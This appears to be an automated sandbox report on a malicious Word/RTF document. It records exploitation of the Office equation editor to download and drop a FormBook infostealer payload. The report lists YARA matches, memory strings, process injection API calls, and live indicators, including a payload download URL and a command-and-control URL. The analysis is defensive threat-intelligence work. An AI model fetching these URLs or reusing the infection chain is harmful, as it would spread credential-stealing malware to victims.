7a e1 8b 5d f1 bc 79 de 38 76 99 b8 33 f0 3c 01 26 7b de 08 69 f3 79 83 e0 15 3c 6f 44 cc 38 0b 9f 37 a9 bc a6 f2 79 83 08 d2 57 8f 0a 24 1d 37 02 44 90 3b ef 71 8e b9 f3 fe 65 bf 3b ef 7f 7a 7f 9b 3b 7f c4 9c 6c ad bf 68 42 b5 19 6a e5 bd 72 18 f8 24 b1 63 cf 3a 79 19 a9 bc be ae f9 9b 73 44 9f 75 2a f8 75 56 51 3d f9 59 db 2a 61 31 0b d1 3c 97 cb cd dd cd 29 16 70 ea 50 0b 3a 07 98 eb b4 44 3f 5e 37 70 b7 59 de cc d5 d9 1f 74 64 28 98 8e 31 c4 11 5d ee fb 30 d4 81 1e f3 f6 6d ff 84 af 26 31 fe aa 6f da 79 57 68 52 e8 37 8a a2 95 ef 28 e0 2b 3f e9 bf b7 01 9e 4b a7 9d eb cc f0 e8 8d 55 7b cd 9c f6 0f 5e 1f 03 43 8a db 1a 2b 22 8f ee da b7 c0 63 ac b9 fc b2 c6 d3 3c 93 b0 79 cc 88 27 af a9 59 51 f3 1c fe a5 6b 1f 70 c2 89 66 b5 1a ce ca 31 09 d7 4e 7c 92 ab e7 80 89 66 6d d7 f7 df f4 d5 07 9e 70 c2 eb 92 cc 57 94 3e fa f7 6e f0 a1 fc 6c ad 7a 0b 34 db 6b 5f 5c 9e ef af ca 2b f4 29 9b 87 77 65 61 62 ab 80 ae 6d 43 5f 10 8a 74 ad d0 f4 ac f8 b7 27 f1 4c 6a e2 6b a9 5f 0d e8 aa aa ec 93 7f 99 31 93 df 78 a2 62 fb 0b 03 8f a7 5a 39 8d 2a 94 21 54 78 06 54 af 15 3d 9f 9a 2c ac 9f 4f 4d db 86 cf a7 56 f3 f6 f9 24 39 6f 9e 4f 32 51 a9 6b 35 04 fa dd 77 d7 00 7f bc 11 c5 0d ea 13 9b 56 fd bd 6c 88 76 13 22 13 e8 94 f0 6a 75 7d 4f db 46 ef d9 45 fc c4 3a 49 Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g
            Source: dfrgui.exe, 00000008.00000002.636013778.00000000036A0000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000004120000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aceautocorp.com/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635242428.0000000000AD5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aceautocorp.com
            Source: sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635242428.0000000000AD5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aceautocorp.com/ufuh/
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: dfrgui.exe, 00000008.00000002.636013778.0000000002EC6000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003946000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.0000000000BF6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: dfrgui.exe, 00000008.00000002.636013778.0000000002EC6000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003946000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.0000000000BF6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
            Source: dfrgui.exe, 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: dfrgui.exe, 00000008.00000003.467181580.0000000005F6C000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.359979447.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/loudzx.scr
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/loudzx.scrj
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/loudzx.scrkkC:
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/v
            Source: 13d6pS3.8.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.636387246.00000000052B0000.00000004.00000800.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000337C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635396875.0000000003DFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Doc PI.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 6.2.loud89334.scr.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.loud89334.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.loud89334.scr.4c80000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.loud89334.scr.341a370.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.loud89334.scr.4c80000.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.loud89334.scr.23f79d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.loud89334.scr.23fa210.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.loud89334.scr.341a370.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.370449287.0000000004C80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\loud89334.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040B0C3 NtCreateSection,6_2_0040B0C3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040B2E3 NtMapViewOfSection,6_2_0040B2E3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040AA93 NtSetContextThread,6_2_0040AA93
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040BBB3 NtDelayExecution,6_2_0040BBB3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040ACA3 NtResumeThread,6_2_0040ACA3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040B513 NtCreateFile,6_2_0040B513
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040A673 NtSuspendThread,6_2_0040A673
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0042BF43 NtClose,6_2_0042BF43
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040B743 NtReadFile,6_2_0040B743
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_0040BFD3 NtAllocateVirtualMemory,6_2_0040BFD3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA07AC NtCreateMutant,LdrInitializeThunk,6_2_00DA07AC
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9F9F0 NtClose,LdrInitializeThunk,6_2_00D9F9F0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00D9FAE8
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00D9FB68
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00D9FDC0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA00C4 NtCreateFile,6_2_00DA00C4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA0048 NtProtectVirtualMemory,6_2_00DA0048
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA0078 NtResumeThread,6_2_00DA0078
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA0060 NtQuerySection,6_2_00DA0060
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA01D4 NtSetValueKey,6_2_00DA01D4
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA010C NtOpenDirectoryObject,6_2_00DA010C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA0C40 NtGetContextThread,6_2_00DA0C40
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA10D0 NtOpenProcessToken,6_2_00DA10D0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA1148 NtOpenThread,6_2_00DA1148
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9F8CC NtWaitForSingleObject,6_2_00D9F8CC
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9F900 NtReadFile,6_2_00D9F900
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9F938 NtWriteFile,6_2_00D9F938
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA1930 NtSetContextThread,6_2_00DA1930
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FAD0 NtAllocateVirtualMemory,6_2_00D9FAD0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FAB8 NtQueryValueKey,6_2_00D9FAB8
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FA50 NtEnumerateValueKey,6_2_00D9FA50
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FA20 NtQueryInformationFile,6_2_00D9FA20
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FBE8 NtQueryVirtualMemory,6_2_00D9FBE8
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FBB8 NtQueryInformationToken,6_2_00D9FBB8
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FB50 NtCreateKey,6_2_00D9FB50
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FC90 NtUnmapViewOfSection,6_2_00D9FC90
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FC48 NtSetInformationFile,6_2_00D9FC48
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FC60 NtMapViewOfSection,6_2_00D9FC60
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FC30 NtOpenProcess,6_2_00D9FC30
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FD8C NtDelayExecution,6_2_00D9FD8C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DA1D80 NtSuspendThread,6_2_00DA1D80
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FD5C NtEnumerateKey,6_2_00D9FD5C
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FED0 NtAdjustPrivilegesToken,6_2_00D9FED0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FEA0 NtReadVirtualMemory,6_2_00D9FEA0
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FE24 NtWriteVirtualMemory,6_2_00D9FE24
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D9FFFC NtCreateProcessEx,6_2_00D9FFFC
